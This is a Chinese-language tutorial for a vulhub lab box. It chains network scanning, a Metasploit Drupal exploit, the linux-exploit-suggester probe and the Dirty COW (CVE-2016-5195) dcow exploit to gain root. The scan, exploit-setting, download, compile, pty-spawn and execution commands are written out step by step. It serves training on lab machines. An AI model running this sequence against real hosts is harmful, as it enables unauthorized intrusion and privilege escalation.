当前位置:   article > 正文

Linux脏牛(CVE-2016-5195)提权保姆级教程_脏牛提权

脏牛提权

脏牛提权 CVE-2016-5195:

该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取  其他只读内存映射的写权限,进一步获取 root 权限。脏牛在Linux提权中比较重要,这里详细讲解一下。

一、靶场环境搭建准备阶段

1.下载vulhub靶机:lampiao

c4fac810cf9329d02062d77df3426cc4.png

2.下载后解压到某个目录:

 

1091383c6b316da91cea8b89845d01bb.png

3.打开我们的靶机和攻击机kali,将他们都设置为NAT模式

 

32fc3427eb9dc50d3ee77f6a74fd5900.png

0a06976bbb7941deb3a97e9ed2e6152d.png

靶机保持上图样式

二、信息收集阶段

1.进入kali,查看本机ip

 

3574b7fd0790ad7c61a95b56e2cda4e7.png

2.进行端口同网段端口扫描:

nmap -sS 192.168.153.0/24

9cb0791dfb35ef649ed764b1e88fa45f.png

3.探测到靶机的ip并获知其开放的22和80端口,对这个ip进行全端口扫描

nmap -p 1-65535 192.168.153.139

 

72d7e4bf9a856de1d3e7e3de27ca6d6c.png

4.观察到开放了1898端口,进入浏览器输入该ip和端口进行访问。

 

e45a8bc961df830600a94a9fd8594f85.png

5.可以看到该网页,滑动窗口在最下面看到一个“Powered by Drupal”

 

1f174a4eabf27021bfb29d45be63dd89.png

6.“msf”,启动!

 

090f18b7fefcb80db92570c0eda68fff.png

7.输入 search Drupal寻找攻击模块,这里我们使用第二个,并查看当前options

 

ce851277dbd004e233f5bef063e6cd4b.png

8.msf设置:

设置靶机ip

set RHOSTS 192.168.153.139

设置端口

set RPORT 1898

运行

run

 

d6023593f1da3aa5a863f9d17b03b916.png

9两种信息收集方式

2.9.1:使用uname -a,找到相应的版本,并查看是否可以有相关漏洞可以利用

 

0e0981ea6610ca60559c93d446ffce58.png

查询对应的版本,猜测可能存在脏牛漏洞(为什么猜测存在脏牛,直白点就是我打的就是脏牛靶场,隐晦点就是通过相关版本可能存在相关漏洞,具体有没有还不清楚,不过也得尝试一下)

2.9.2:使用相关探针进行探测,这里我们使用linux-exploit-suggester.sh

下载方式

git clone https://github.com/mzet-/linux-exploit-suggester

10.在msf中将目录切换到/tmp目录下

 

ee829aec9fdf0d2370c2ab026b06ce24.png

12.将我们下载的漏洞探针文件上传到靶机的tmp目录下并命名为1.sh

a71c2b75df3bd972869f3d17e645d8e7.png

13.进入shell会话,我们首先输入./1.sh会发现无法运行该命令,没有运行的权限,输入chmod +x 1.sh(给其运行的权限)后,输入./1.sh重新运行.

09e1c17f35b30a35ccad94dfd80ebed0.png

这里可以看到存在相关的漏洞

0501b80b431e8f96264c3be7a30de5c3.png

三、提权阶段

1.信息收集完毕后,下载相应的提权文件

git clone https://github.com/gbonacini/CVE-2016-5195

85ae3056a5fda9e35b20ee15ba4ef39c.png

2.先上传到目标主机中 upload /root/d cow.cop(如果目标是出网的,可以尝试直接下载该exp)

3.在我们的shell界面上输入

g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

将dcow.cpp编译成dcow(可执行文件)

4c4ea93258d3ed3d81926a30941d3b67.png

4.创建一个会话(因为需要特定的会话才能运行这个dcow文件)

python -c 'import pty; pty.spawn("/bin/bash")'

5.输入./dcow执行dcow这个程序

3189c2a18b19c9b67196b18c015d14b2.png

6.使用ssh远程连接,切换成功。

ebb52c52c18f1d4adefcff75885cb549.png

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/空白诗007/article/detail/777789
推荐阅读
相关标签
  

闽ICP备14008679号